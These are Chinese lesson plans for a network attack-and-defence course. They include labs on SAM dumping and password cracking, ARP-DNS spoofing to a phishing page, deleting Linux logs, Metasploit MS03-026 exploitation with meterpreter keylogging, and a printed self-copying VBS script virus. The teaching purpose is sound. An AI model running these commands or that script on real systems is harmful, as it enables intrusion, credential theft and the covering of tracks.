《网络攻防技术》教案全套 -第1-7章 网络攻击技术概述- 移动互联网应用的攻防

网络攻防技术课程教案学年第学期

教案（课时授课计划）教师姓名授课班级授课形式讲授授课日期授课章节名称第1章网络攻防技术概述教学目的与要求1.让学生了解网络攻防的意义；2.让学生了解网络攻防基本概念以及常用方法教学重点或教学难点重点：了解黑客、骇客以及红客的概念；了解网络攻击的类型、属性以及方法。端口扫描、口令攻击、彩虹表等攻击方法。难点：彩虹表的工作原理。更新、补充、删节内容无使用教具或手段多媒体课外作业课后习题课后体会授课主要内容或板书设计第1章网络攻击技术概述1.1黑客、红客以及红黑对抗黑客与红客红黑对抗1.2网络攻击的类型主动攻击主动攻击是指攻击者为了实现攻击目的，主动对需要访问的信息进行非授权的访问行为。主要针对信息的可用性，完整性和真实性进行攻击。被动攻击利用网络存在的漏洞和安全缺陷对网络系统的硬件、软件及其系统中的数据进行的攻击。一般不对数据进行篡改，通过截取或者窃听等方式，未经用户授权。1.3网络攻击的属性权限转换方法动作1.4主要攻击方法1.5网络攻击的实施过程1.6网络功放的发展趋势教案（课时授课计划）教师姓名授课班级授课形式上机授课日期年10月9日第6周授课时数3授课章节名称攻防平台配置、Linux基本命令教学目的与要求1.熟悉Kali在虚拟机中的安装。2.掌握Linux基本操作命令。教学重点或教学难点重点：学习Kali在虚拟机中的安装，熟悉Linux常用的cp、mv、mkdir等操作命令，通过实际操作加深印象。难点：了解Linux的文件系统。更新、补充、删节内容无使用教具或手段多媒体课外作业常用命令的综合练习课后体会授课主要内容或板书设计1.虚拟机下Kali的安装1.1安装Kali系统1.2设置软件源1.3安装open-vm-tool2.Linux文件系统2.1根目录和用户目录2.2绝对路径和相对路径2.3ls、cd和pwd2.4cp和mv2.5touch、mkdir和rm2.6其他常用指令2.7通配符

教案（课时授课计划）教师姓名授课班级授课形式讲授授课日期年10月14日第7周授课时数3授课章节名称第2章Windows操作系统的攻防教学目的与要求1.了解Windows操作系统的安全机制。2.了解Windows系统下针对数据、账户以及进程与服务的攻防。教学重点或教学难点重点：掌握EFS工作原理，掌握SID的概念以及特点，了解Windows系统的SAM文件，了解进程与服务概念以及常用端口。难点：理解Kerberos工作机制。更新、补充、删节内容无使用教具或手段多媒体课外作业课后体会授课主要内容或板书设计第2章Windows操作系统的攻防2.1操作系统的安全机制Windows操作系统的层次结构Windows服务器的安全模型用户账户管理用户模式和内核模式2.2针对Windows数据的攻防数据本身的安全EFS加密BitLocker加密数据存储安全独立冗余磁盘阵列（RAID）技术双机热备数据迁移异地容灾2.3针对账户的攻防账户和组用户的登录和认证NTLM登录验证Kerberos登录验证账户的密码和安全SAM文件的获取:SAM文件开始被系统调用而无法直接复制，但可通过以下两种方式获取：复制SAM备份文件使用regsavehklm\samsam.hive命令将SAM文件备份出来SAM文件的破解 利用LC5、10phtcrack、WMIcrack、SMBcrack等工具软件破解SAM文件内容权限管理2.4针对进程与服务的攻防进程、线程、程序和服务的概念重要系统进程常见的服务与端口

教案（课时授课计划）教师姓名授课班级授课形式上机授课日期年10月16日第7周授课时数3授课章节名称Windows加密，口令破解实验教学目的与要求掌握EFS加密以及Windows系统的口令破解教学重点或教学难点重点：使用EFS对文件进行加密，学会备份SAM文件并对其进行破解，掌握FTP和远程桌面连接的使用。难点：安装和配置FTP服务器并进行上传更新、补充、删节内容无使用教具或手段多媒体课外作业1、让学生思考下实验还有哪些未完成的事情。2、尝试破解系统的administrator，记录遇到的问题，并写下解决方法。课后体会授课主要内容或板书设计Windows加密，口令破解实验口令破解实验情景设置主题情境背景：某公司员工A电脑有份重要价值的文件，员工B想要拿过来去卖给别的公司。主题情境目标：员工B通过使用工具渗透到员工A的电脑上，窃取那份文件。主题情境条件设置：文件为员工A的私有文件员工B知道员工A使用的是微软已经停止更新服务的XP系统员工A下班回家，为便于回家后还可以继续访问公司电脑。他让管理员把他的电脑开通了远程桌面实验分析与设计实验环境配置用户口令破解漏洞利用，获取shell权限创建管理员账户SAM文件获取离线破解用户口令窃取文件使用员工A账户远程登陆访问待窃取的文件2.Windows加密当前用户A采用EFS加密文件或文件夹切换其他用户B登录，访问EFS加密的文件,可发现不可以读取已加密的文件切换回用户A登录，可直接访问A之前采用EFS加密的文件

教案（课时授课计划）教师姓名授课班级授课形式讲授授课日期年10月21日第8周授课时数3授课章节名称第2章Windows操作系统的攻防教学目的与要求了解Windows系统下针对日志、系统漏洞以及注册表和组策略的攻防教学重点或教学难点重点：了解Windows系统日志的基本功能以及管理维护，了解漏洞产生的原因以及攻击与防范对策，掌握Windows系统中注册表以及组策略的使用。难点：学会利用漏洞发起攻击。更新、补充、删节内容无使用教具或手段多媒体课外作业课后体会授课主要内容或板书设计第2章Windows操作系统的攻防2.5针对日志的攻防Windows日志概述日志分析防火墙日志分析通过对防火墙日志的分析，可以找出针对本地主机的潜在威胁，并对攻击者的IP进行溯源。IIS日志分析日志管理网络入侵基本步骤系统日志安全保护目标假设一旦攻击行为已经成功完成了前两步的操作的前提下，仍然能够保护系统日志的安全系统日志安全保护方式加强对日志文件访问账号的安全管理对日志文件进行安全备份2.6针对系统漏洞的攻防Windows系统漏洞利用漏洞攻击方式0Day漏洞通用漏洞披露库（CVE）典型的利用漏洞的攻击过程漏洞扫描攻击工具准备发起攻击补丁管理安装软件补丁是安全和迅速解决小范围软件错误的有效途径2.7针对注册表和组策略的攻防针对注册表的攻防注册表的概念注册表简介针对组策略的攻防组策略（GroupPolicy）是Windows系统中一个能够让系统管理员充分管理用户工作环境的工具，通过它可以为用户设置不同的工作环境。组策略配置组策略、注册表、控制面板对比本地安全策略教案（课时授课计划）教师姓名授课班级授课形式上机授课日期年10月23日第8周授课时数3授课章节名称ARP和DNS欺骗攻击教学目的与要求1.掌握ARP欺骗的原理2.掌握DNS欺骗的原理教学重点或教学难点重点：掌握ARP欺骗和DNS欺骗的原理难点：使用工具实践ARP和DNS欺骗更新、补充、删节内容无使用教具或手段多媒体课外作业课后体会授课主要内容或板书设计ARP和DNS欺骗攻击ARP原理ARP协议：ARP（AddressResolutionProtocol，地址解析协议）是一个位于TCP/IP协议栈中的网络层，负责将某个IP地址解析成对应的MAC地址。ARP协议的基本功能：通过目标设备的IP地址，查询目标设备的MAC地址，以保证通信的进行。ARP攻击的局限性：ARP攻击仅能在局域网进行，无法对外网进行攻击。ARP攻击的攻击原理：ARP攻击就是通过伪造IP地址和MAC地址实现ARP欺骗，能够在网络中产生大量的ARP通信量使网络阻塞，攻击者只要持续不断的发出伪造的ARP响应包就能更改目标主机ARP缓存中的IP-MAC条目，造成网络中断或中间人攻击。常见的ARP欺骗手法：同时对局域网内的一台主机和网关进行ARP欺骗，更改这台主机和网关的ARP缓存表。如下图（PC2是攻击主机，PC1是被攻击主机）所示：主题情景设置主题情景背景：A为犯罪嫌疑人，警察B想获得A在其单位网站的用户名与密码，以从A单位邮箱中查找犯罪证据文件主题情景目标：警察B通过ARP—DNS欺骗，将A访问单位网站跳转到与其单位网站几乎一样的钓鱼网站，进而获得嫌疑人A的用户名与密码主题情境条件设置：警察与嫌疑人的电脑在同一局域网内已有A单位的钓鱼网站实验过程攻击机运行Cain工具，配置“Sniffer”标签项选取嗅探的协议类型和端口号选择ScanMACAddresses进行扫描进行嗅探选择网关和被欺骗地址配置ARP-DNS选项.(将其单位网站的访问欺骗到IP地址为0的主机上)。进行ARP欺骗嫌疑人A访问其当我网站将跳转到主机0上布置的钓鱼网站。在嫌疑人登录其单位网站，即可以获得A的用户名与密码。

教案（课时授课计划）教师姓名授课班级授课形式理论授课日期年10月28日第9周授课时数3授课章节名称Linux操作系统的工作与安全机制教学目的与要求了解Linux系统的工作与安全机制教学重点或教学难点重点：掌握Linux系统用户和组的概念，掌握Linux系统身份的几种认证方式以及特点，掌握Linux系统权限分配与访问控制机制，了解Linux系统日志的基本概念和管理维护。难点：Linux系统用户权限中SUID和SGID的概念更新、补充、删节内容无使用教具或手段多媒体课外作业简述Linux系统的安全机制及主要实现方法。Linux环境中的用户账户分为哪几类？如何获取其信息？如何进行安全防范？课后体会

授课主要内容或板书设计1Linux操作系统的工作机制1.1Linux操作系统概述Linux基本思想是：一切都是文件。即系统中包括命令、硬件和软件设备、进程等所有对象对于操作系统内核而言都被视为拥有各自特性或类型的文件。1.2Linux操作系统的结构从体系结构来看，Linux操作系统的体系架构分为用户态和内核态，也称为用户空间和内核。硬件抽象层中的各类设备驱动程序可以完全访问硬件设备，方便地以模块化形式设置，并在系统运行期间装载和卸载。硬件抽象层以上是内核服务功能模块，包括：进程管理、内存管理、文件系统管理、设备控制与网络5个子系统。所有的内核模块通过系统调用接口向用户态的GNU运行库及工具、命令行shell及应用软件服务。1.3Linux操作系统的工作机制Linux操作系统在进程与线程管理、内存管理、文件系统管理、设备控制、网络、系统调用等方面都形成了特有的工作机制。进程管理内存管理、文件管理及设备管理网络管理Linux操作系统的安全机制2.1用户和组1、用户：Linux的用户信息保存在系统的/etc/passwd文件中，主要包括用户名、用户唯一的标识（uid）、使用Shell类型、用户初始目录等，而被加密后的口令则存放在/etc/shadow文件中，只有Root用户可以读取其信息。Root普通用户系统用户2、组Linux组信息保存在系统的/etc/group文件中，包括组名称、组标识（gid）以及组所包含的用户名列表，组的被加密后的口令保存在/etc/gshadow文件中。2.2身份认证1、本地身份认证口令认证：登录进程通过Crypt()函数对用户输入的口令进行验证，并通过引入在用户设置密码时随机产生的salt值来提高身份认证的安全性。2、远程身份认证普遍采用SSH（SecureShell）服务来实现对远程访问的安全保护。Ssh也相应的提供两种认证方式：基于口令和基于非对称密钥（服务器收到登录指令，用公钥加密质疑，用户用私钥解密再发给服务器）3、可插入身份认证模块系统管理员通过PAM配置文件（etc/pam.conf）来定制身份认证策略Linux的PAM配置可以在/etc/pam.conf文件或/etc/pam.d/目录下进行，系统管理员可以根据需要进行灵活配置。不过，这两种配置方式不能同时起作用，即只能使用其中一种方式对PAM进行配置，一般为/etc/pam.d/优先。2.3访问控制Linux的权限分配与访问控制机制【核心基于一切都是文件】（3）所属组和其他用户在Linux系统中，UID是代表拥有者的唯一标识。根据管理需要，一个UID可以指派到一个或多个GID中进行管理。（4）SUID和SGID例：Linux系统文件访问权限的执行位上，有一类特殊的执行权限，或被称为“特权”，常见的SUID和SGID。s标志出现在文件所有者的x权限上时，则此程序被设置了SUID特殊权限。【Eg】在系统中有两个passwd文件，一个在/etc文件夹下，存放用户的口令等信息，是—个文本文件，任何用户都可以读，另一个在，usr／bin目录下，是一个可执行命令。ls-l/usr/bin/passwd-rwsr-xr-x.1rootroot25980Feb172012/usr/bin/passwd//可以看到该文件所属主权限标志位上是rws,文件属主是root,其他人具有执行权限(x),就是说当其他人执行该命令是会暂时获得文件属主权限,即root权限,而root是可以操作/etc/shadow文件的。passwd是一个命令,即一个可执行二进制文件,可以使用这个命令来修改用户密码。由于用户密码是存储在/etc/shadow文件中,但是该文件权限是640,就是不允许任何人修改(root除外),使用该命令能修改用户密码,是因为执行该命令的时候我们拥有了一个特殊权限,这个特殊权限让我们可执行passwd命令修改密码那一刻才能修改shadow文件。2.4Linux的日志Linux系统的日志服务由日志守护进程syslog管理，syslog位于/etc/syslog、/etc/syslogd或/etc/rsyslog.d中，默认配置文件为/etc/syslog.conf或rsyslog.conf，当某一程序要生成日志时都需要通过配置向syslog发送信息。默认配置下，日志文件通常都保存在/var/log目录下。系统接入日志：/var/log/wtmp和/var/log/utmp。/var/log/messages是系统管理员在进行故障诊断时首先要查看的文件。（核心系统日志文件：包含系统启动、I/O错误、网络错误和其他系统错误）。wtmp文件记录每个用户登录、注销及系统的启动、停机的事件（跟last命令差不多：last–u；last-t）。一般黑客会删除的日志文件有：lastlog、utmp(utmpx)、wtmp(wtmpx)、messages、syslog。

教案（课时授课计划）教师姓名授课班级授课形式上机授课日期年10月30日第周授课时数3授课章节名称Linux用户和组的管理、文件权限管理、用户密码破解教学目的与要求1.掌握Linux系统中用户和组的管理命令2.掌握Linux系统中文件权限设置的命令3.掌握口令破解工具彩虹表的使用教学重点或教学难点重点：掌握Linux系统中用户与组管理的常用命令，掌握彩虹表工具的使用。难点：理解Linux系统文件访问权限概念并会进行实际操作更改访问权限。更新、补充、删节内容无使用教具或手段多媒体课外作业常用的用户和组管理命令综合练习课后体会授课主要内容或板书设计1.Linux系统的用户和组1.1用户与UID1.2用户组2.用户管理2.1用户管理命令2.2密码管理2.3与用户管理相关的文件2.4与用户管理相关的其他命令3.组管理命令3.1组管理的基本命令3.2与组管理相关的其他命令4彩虹表4.1生成彩虹表4.2利用彩虹表破解口令

教案（课时授课计划）教师姓名授课班级授课形式理论授课日期年11月4日第10周授课时数3授课章节名称Linux系统本地与远程的攻防教学目的与要求1.Linux主机账户信息的获取2.Linux主机的远程渗透攻击3.DNS服务器的攻防4.Apache服务器的攻防5.Linux用户提权方法教学重点或教学难点重点：掌握Linux系统中用户用户提权方法。难点：安全漏洞及利用得方法。更新、补充、删节内容无使用教具或手段多媒体课外作业通过实际操作，掌握利用.htaccess对Apache服务器进行安全保护的方法。介绍Linux系统中对普通用户账户进行提权的方法。课后体会授课主要内容或板书设计1Linux主机账户信息的获取1.1远程登陆账户信息的获取一种最高效的办法是在直接获取保存远程登录账户信息的文件（一种最高效的办法是在直接获取保存远程登录账户信息的文件（/etc/passwd和etc/shadow）后，再从文件中取得用户名和窗口。直观方法缺点：出现于安全考虑，Linux系统对保存用户账户信息的文件从存储和访问控制等方面都设置了严格的管理权限，只有Root用户才能读取，而要获取Root用户的权限则需要获得其密码。多通过口令猜测或暴力破解等攻击手段来获取远程登录账户的信息。常用方式一般过程：先利用Linux系统上的rusers、sendmail、finger等服务来获取被攻击Linux主机上的用户名，然后再通过猜测（针对弱口令）、字典攻击、暴力破解等方式来获得对应的密码。其中，由于Root账户的重要性，利用该方法获得其登录密码几乎成为所有攻击者的关注目标。1.2远程登陆账户的防范方法2Linux主机的远程渗透攻击2.1Linux安全漏洞及利用例：RHELLinux系统内核网络协议栈实现（net/ipv4/udp.c）中存在一个远程拒绝服务安全漏洞（CVE-2010-4161），攻击者通过向目标主机上任意开放的UDP端口发送一个特殊构造的UDP数据包，就可以发起对目标主机的DoS攻击。2.2针对远程渗透攻击的防范方法3DNS服务器的攻防DNS（DomainNameSystem，域名系统）是互联网绝大多数应用的实际寻址方式，域名是互联网上的身份标识，是不可重复的唯一标识资源。DNS因其在互联网应用中的重要性，已成为网络攻击的主要对象。例：一个典型的DNS攻击过程分析。受暴风影音软件存在的设计缺陷以及免费智能DNS软件DNSPod的不健壮性影响，黑客通过僵尸网络控制下的DDoS攻击，致使我国江苏、安徽、广西、海南、甘肃、浙江等省在内的23个省出现罕见的断网故障，即“5•19断网事件”。3.1DNS安全防范方法3.2针对基于BIND软件的DNS的安全管理方法4Apache服务器的攻防4.1针对Apache服务器常见攻击方式4.2安全防范方法1、隐藏Apache版本2、创建安全目录结构3、为Apache分配专门的执行账户4、Web目录的访问控制5Linux用户提权方法通过远程渗透技术，攻击者可以获得系统的远程访问权限，并能够实现远程登录。在完成了远程登录后，攻击者就转向对本地主机的攻击。本地主机攻击过程中最重要的是用户权限的提升。5.1通过获取/etc/shadow文件的信息来提权5.2利用软件漏洞来提权在无法通过获取/etc/shadow文件的情况下，可以利用Linux系统软件中存在的漏洞来完成提权操作。1、利用sudo程序的漏洞进行提权2、利用SUID程序漏洞进行提权3、利用Linux内核代码漏洞进行提权5.3针对本地提权攻击的安全防范方法结合本节介绍的几类提权攻击方法，下面主要基于Linux服务器的应用，从系统管理的角度提些建议：1、针对SUID特权程序；2、针利利用代码漏洞进行本地提权问题；3、针对Linux在访问控制机制中存在的本地提权漏洞。教案（课时授课计划）教师姓名授课班级授课形式上机授课日期年11月6日第10周授课时数3授课章节名称实验：Linux系统日志清除、及键盘记录教学目的与要求1.了解Linux日志的作用、存放位置、工作特点以及删除方法。2.Metasploit框架有个初步的认识教学重点或教学难点重点：掌握Linux系统日志的组成、存放位置以及安全管理方法。更新、补充、删节内容无使用教具或手段多媒体课外作业课后体会综合运用Linux系统提供的大量命令，通过系统的、关联的分析还是能够找到攻击者的蛛丝马迹。授课主要内容或板书设计1情境背景目标：入侵Linux系统后，查阅当前系统的日志信息，分析之前用户运维操作的命令，并将入侵日志删除。方法：将前序课程学习到的Linux命令，结合本课程日志文件存放位置及格式，进行相关操作。从攻击者的角度来看，日志文件中记录的事件信息对攻击者掌握系统的运行内容和运行状况是很有帮助的；而从防范的角度看，日志中可以记录几乎所有的攻击行为，这些事件信息对于确定攻击源及攻击意图，进而确定相应的防范方法都是很有价值的。在Linux系统中，有3个主要的日志子系统：系统接入日志。多个程序会记录该日志，分别记录到/var/log/wtmp和/var/log/utmp中，telnet和ssh等程序都会更新wtmp与utmp文件，系统管理员可以根据该日志跟踪到谁在什么时间登录过系统。进程统计日志。进程统计日志由Linux内核记录，当一个进程终止时，进程终止文件（pacct或acct）中会进行记录这一事件。进程统计日志可以供系统管理员分析系统使用者对系统进行的配置，以及对文件进行的操作。错误日志。Syslog日志系统已经被许多设备兼容，Linux的syslog可以记录系统事件，主要由syslogd程序执行，Linux系统下各种进程、用户程序和内核都可以通过Syslog文件记录重要信息，错误日志记录在/var/log/messages中。2实验一目的2.1Linux日志的作用。2.2Linux日志的存放位置及工作特点。2.3Linux日志的删除方法。3实验一过程3.1查看Linux系统日志。Step1：以root身份登录系统后，执行“cat/var/log/messages”等命令查看以各个日志内容：/messages、/secure。Step2：以root身份登录后，执行“who/var/log/wtmp”（如图3-28所示）、“last”命令，查看wtmp文件的内容。3.2手动删除Linux日志使用root身份登录系统，执行命令：rm–f/var/log/wtmp（如图3-31所示），再用ls/var/log命令查看/var/log目录下的日志文件，发现wtmp被删除。使用相同的方法，可以对其他日志文件进行修改、删除操作。4实验二目的本小节要求对Metasploit框架有个初步的认识。4.1主要介绍了Metasploit框架中Meterpreter模块的部分应用。4.2在Metasploit帮助文档和技术资料的帮助下，通过具体实验，掌握Metasploit的主要应用功能。5实验二过程Step1：打开攻击机，启动MSFConsole。Step2：输入“searchms03_026”命令，查询“MS03-026漏洞”的相关信息。Step3：输入“useexploit/windows/dcerpc/ms03_026_dcom”命令，查看“利用漏洞”程序需要设置的相关内容。Step4：对攻击环境进行配置。其中：设置攻击主机（靶机）的IP地址；设置本机（攻击机）的IP地址；设置监听端口；最后输入“exploit”命令，会看到探测到对方的系统类型和语言版本，并且显示已经打开的meterpreter会话。Step5：执行完exploit后，就已经获得了一个meterpreter

shell。接下来获取系统权限。Step6：meterpreter能够获得并记录目标主机上的键盘输入信息，即能够远程记录对方在自己的计算机上输入的信息，运行“getuid”命令，会看到已经具有administrator权限了。Step7：启动键盘记录命令“keyscan_start”，开始记录键盘信息。Step8：输入“keyscan_dump”命令，进行键盘输入信息的监听。Step9：最后，输入“keyscan_stop”命令，停止键盘记录教案（课时授课计划）教师姓名授课班级授课形式理论授课日期年11月11日第11周授课时数3授课章节名称计算机病毒、蠕虫、木马以及后门教学目的与要求1.了解恶意代码的各种类型及特征2.掌握恶意代码之间的区别（传播机制、工作机制）3.掌握恶意代码的防范方法教学重点或教学难点重点：掌握恶意代码的基本特征难点：恶意代码实施攻击方式上的特点以及防范方法。更新、补充、删节内容无使用教具或手段多媒体课外作业什么是恶意代码？主要包括哪些类型？具有什么基本特征？并简述各类恶意代码的感染和传播机制？课后体会授课主要内容或板书设计课程情境导入Step1：生成可监听的exe执行程序：Step2：靶机端植入iambad.exe，在攻击端上配置PayloadHandler：Step3：靶机上双击刚才生成的恶意可执行程序，攻击端进行连接监听：问题思考示例中的iambad.exe程序，如果将这个执行文件自行引导？通过什么方式设计的更为隐蔽及难以溯源？1计算机病毒1.1计算机病毒的生命周期1.2逻辑结构及基本特征1.3计算机病毒的分类及传播机制根据病毒所依附的宿主程序的不同，可将计算机病毒主要分为可执行文件病毒、引导扇区病毒和宏病毒3种类型。一旦病毒在计算机系统中被触发，它就会寻找可供感染的宿主程序位置，并复制自身并寄生在宿主身上，病毒可能依附在移动存储或硬盘的引导扇区，或者以嵌入代码的文档、可执行文件或者脚本文件。而传播的途径主要有：介质、电子邮件等。1.4计算机病毒的防范方法2蠕虫2.1网络蠕虫的特征与工作机制【核心】网络传播是蠕虫的本质内容。网络蠕虫的功能结构包括主体功能和辅助功能两部分。其中，主体功能包括信息搜集模块、探测模块、攻击模块和自我推进模块4个模块；辅助功能包括实体隐藏模块、宿主破坏模块、通信模块和自动更新模块4个模块。2.2网络蠕虫的扫描方式1、选择性随机扫描2、顺序扫描3、目标地址列表扫描4、基于路由的扫描5、基于DNS扫描6、分治扫描7、被动式扫描各种扫描策略的差异主要在于目标地址空间的选择。网络蠕虫感染一台主机的时间取决于蠕虫搜索到易感染主机所需要的时间。因此，网络蠕虫快速传播的关键在于设计良好的扫描方式。一般情况下，采用DNS扫描传播的蠕虫速度最慢，选择性扫描和路由扫描比随机扫描的速度要快。分治扫描目前还没有找到易于实现且有效的算法2.3网络蠕虫的防范方法3木马3.1木马的基本特征及隐藏技术区别：通过判别是否具有传染性可将木马与病毒、蠕虫区别开来，通过判别传染途径是局限于本机还是透过网络可将病毒和蠕虫区别开来。木马被植入后，通常利用各种手段来隐藏痕迹，以避免被发现和追踪，隐藏技术分为以下：本地隐藏；通信隐藏；协同隐藏。每一种隐藏技术的实现方法不尽相同，归纳起来主要分为以下3种类型：将木马隐藏（附着、捆绑或替换）在合法程序中；修改或替换相应的检测程序，对有关木马的输出信息进行隐蔽处理；利用检测程序本身工作机制或缺陷巧妙地避过木马检测。该方法无需修改检测程序，就能达到隐藏的目的3.2各类型木马1、网页木马表现形式：一个或一组有链接关系、含有（用VBScript、JavaScript等脚本语言编写的）恶意代码的HTML页面，恶意代码在该页面或一组相关页面被客户端浏览器加载、渲染的过程中被执行，并利用浏览器及插件中的漏洞隐蔽地下载、安装、执行病毒或间谍软件等恶意可执行文件。主要攻击流程：2、硬件木马对象：能够实现对专用集成电路（ASIC）、微处理器、微控制器、网络处理器、数字信号处理器（DSP）等硬件的修改，也能实现对FPGA（field-programmablegatearray，现场可编程门阵列）比特流等固件的修改。根据硬件木马的不同特性，从不同的角度将其分类，其中最为常见的分类方式有3种：组合型木马和时序型木马触发和有效载荷两部分根据硬件木马的物理特性、激活特性和活动特性分类3、挖矿木马挖矿木马的主要类型：僵尸网络：专门用于挖矿的僵尸网络主要有“Bondnet”、“yamMiner”、“隐匿者”。网页挖矿3.3木马的防范防范1、主机木马的查看方法2、传统木马的防御方法3、网页木马的防御方法4后门4.1后门的功能和特点1、方便再次入侵2、隐藏操作痕迹3、绕过监控系统4、提供恶意代码植入手段4.2后门的分类根据实现方式不同，可将后门分为网页后门、线程插入后门、扩展后门、C/S后门和账户后门几种类型。4.3后门的防范方法由于后门隐藏包括应用级隐藏和内核级隐藏，所以其检测和防御方法也分为应用级和内核级2种类型。后门的应用级检测和防御后门的内核级检测和防御教案（课时授课计划）教师姓名授课班级授课形式上机授课日期年11月13日第11周授课时数3授课章节名称实验：脚本病毒编写教学目的与要求1.了解脚本与脚本病毒的基本概念。2.了解常见脚本病毒的工作原理、种类及特点。3.了解简单脚本病毒的编写方法。4.了解常见脚本工具的使用方法。教学重点或教学难点重点：了解脚本病毒编写、实施攻击的过程。更新、补充、删节内容无使用教具或手段多媒体课外作业课后体会授课主要内容或板书设计1情境设置目标：编写恶意脚本，破坏目标系统的右键快捷键功能，并且不让目标系统用户进行注册表管理。方法：在虚拟机中，使用的VBS脚本病毒生成器软件“病毒制造机”，编写脚本病毒，并观察感染后的系统变化情况。脚本病毒的书写形式灵活，容易产生变种。目前网络上存在的脚本病毒绝大多数都用VBScript和JavaScript编写。2实验过程2.1感染病毒并观察感染后的系统变化情况。主要操作步骤如下：Step1：将生成的脚本病毒文件置于虚拟机中，双击使之运行。然后，为保证完整准确地查看病毒的感染效果，可重启已经感染了病毒的虚拟机系统。之后，根据病毒文件生成时的设置，观察系统感染了病毒后的表现情况。Step2：观察系统文件夹下的异常变化，可以发现，在C:\Windows、C:\Windows\system32下多了不明来源的脚本文件。Step3：检查各项系统功能，发现右键快捷菜单功能被禁止。在“开始”菜单中，“运行”命令被去除，利用快捷键Win+R（“运行”的快捷键），会弹出报错信息（如图1）。在C:\windows下运行注册表管理器程序regedit.exe，同样也会弹出报错信息，提示功能被禁（如图2）。图1系统报错信息图2注册表编辑器已禁用的提示信息Step4：检查IE浏览器的各项功能，查看异常，会发现IE浏览器主页被恶意篡改。依次单击“菜单栏→工具→Internet

选项”，发现无法正常打开Internet

选项。另外，IE浏览器的右键快捷菜单功能也被禁用。2.2脚本病毒代码分析。分析脚本病毒的源码，理解各条语句的含义。用“记事本”等文本编辑工具打开病毒脚本，查看其代码。代码内容摘录如下：1

OnErrorResumeNext2

Setfs=CreateObject("Scripting.FileSystemObject")3

Setdir1=fs.GetSpecialFolder(0)4

Setdir2=fs.GetSpecialFolder(1)5

Setso=CreateObject("Scripting.FileSystemObject")6

dimr7

Setr=CreateObject("Wscript.Shell")8

so.GetFile(WScript.ScriptFullName).Copy(dir1&"\Win32system.vbs")9

so.GetFile(WScript.ScriptFullName).Copy(dir2&"\Win32system.vbs")10

so.GetFile(WScript.ScriptFullName).Copy(dir1&"\StartMenu\Programs\启动\Win32system.vbs")11

r.Regwrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun",1,"REG_DWORD"12

r.Regwrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools",1,"REG_DWORD"13

r.Regwrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLogOff",1,"REG_DWORD"14

r.Regwrite"HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Win32system","Win32system.vbs"15

r.Regwrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu",1,"REG_DWORD"16

r.Regwrite"HKCU\Software\Policies\Microsoft\InternetExplorer\Restrictions\NoBrowserContextMenu",1,"REG_DWORD"17

r.Regwrite"HKCU\Software\Policies\Microsoft\InternetExplorer\Restrictions\NoBrowserOptions",1,"REG_DWORD"18

r.Regwrite"HKEY_USERS\.DEFAULT\Software\Microsoft\InternetExplorer\Main\StartPage",【解释】第1行语句的含义是启用错误处理程序，目的在于为了当程序发生错误的时候忽略错误而继续向下执行，从而不要打断程序的执行流程，保证后续的代码可以继续执行。第3行和第4行语句中，使用了GetSpecialFolder(folderspec)函数，当参数folderspec等于0时，函数返回值为Windows文件夹（一般为C:\Windows或C:\WINNT）；当参数folderspec等于1时，函数返回值为System文件夹（常见于C:\Windows\system32）。第8行至第10行语句的作用依次为复制病毒文件夹到Windows文件夹、system32文件夹、启动菜单。第11行至第15行语句的作用依次为禁止“运行”菜单、禁止使用注册表编辑器、禁止注销菜单、开机自动运行以及禁止右键快捷菜单。第16行至第18行语句的作用依次为禁用IE浏览器右键菜单、禁止Internet选项、设置默认主页为。

教案（课时授课计划）教师姓名授课班级授课形式理论授课日期年11月18日第12周授课时数3授课章节名称僵尸网络以及Rootkit教学目的与要求1.了解僵尸网络结构、组成及各模块具体功能2.了解Rootkit工具集实施攻击的几种方式教学重点或教学难点Rootkit攻击具体实施过程更新、补充、删节内容无使用教具或手段多媒体课外作业简述僵尸网络的工作机制，并分析其防御方法。通过对Rootkit攻击技术的介绍，简述其检测和防御方法。课后体会授课主要内容或板书设计1僵尸网络的概念僵尸网络融合了传统恶意代码的优势，实现了控制功能与攻击任务的分离，用作命令与控制的C&C服务器的搭建较为容易。1.1僵尸网络结构僵尸程序（bot）僵尸网络（botnet）攻击者（botmaster）命令与控制（commandandcontrol，C&C）1.2僵尸网络结构组成及功能在僵尸网络中，根据攻击过程中所发挥功能的不同，可以将僵尸程序的功能模块分为主体功能模块和辅助功能模块两部分。1.3僵尸网络的工作机制及特点基于IRC协议的僵尸网络的工作机制如图：1.4僵尸网络的防御与反制2Rootkit2.1概念Rootkit是攻击者使用的一个软件工具集，用于获得对系统的非授权访问，为攻击者获取敏感数据提供特殊权限，并隐藏自己的存在，而且根据需要允许安装其他恶意软件，是能够获得系统特权并能够控制整个系统的工具集。例：以Windows为例具体进行讨论：要存在能够挂钩的地方都可以实现基于挂钩的Rootkit攻击。从理论上讲，不管是用户模式还是内核模式，只要存在能够挂钩的地方都可以实现基于挂钩的Rootkit攻击。1、挂钩Windows环境下主要有两种实现API函数挂钩的操作：一种是通过修改PE（PortableExecutable，可移植执行体）文件的IAT（ImportAddressTable，输入地址表）使API函数地址重定向，该方式称为IATHooking（基于IAT表的挂钩），图1为IATHooking工作过程。图1一种是篡改API函数地址中的机器码，即用无条件跳转指令JMP的机器码来替换API函数入口地址中的机器码，该方式称为InlineHooking，图2为InlineHooking的工作过程。图22、DKOM技术DKOM（DirectKernelObjectManipulation，直接内核对象操作）Rootkit攻击与挂钩攻击区别：API函数挂钩攻击和描述符表挂钩攻击都是利用被攻击对象的工作机制，通过修改程序执行流程或重定向指令等方式来实现Rootkit攻击；DKOMRootkit攻击技术通过直接修改Windows系统的设备驱动程序或可加载内核模块，以实现进程、文件和网络连接的隐藏和进程提权。3、虚拟化技术2.2Rootkit检测方法Rootkit的检测方法可分为基于软件的检测法和基于硬件的检测法2种类型。1、基于软件的检测法基于软件的检测法分为行为检测法、完整性检测法、执行时间检测法、执行路径检测性和差异检测法几种类型。2、基于硬件的检测法2.3Rootkit防范技术1、固件级防御2、内核级防御3、用户级防御4、虚拟级防御教案（课时授课计划）教师姓名授课班级授课形式实验授课日期年11月20日第12周授课时数3授课章节名称恶意网页攻击教学目的与要求1.脚本的特征和编写方法。2.网页病毒的特征和攻击方式。3.网页病毒的安全防范方法。教学重点或教学难点重点：网页病毒触发的过程。更新、补充、删节内容无使用教具或手段多媒体课外作业课后体会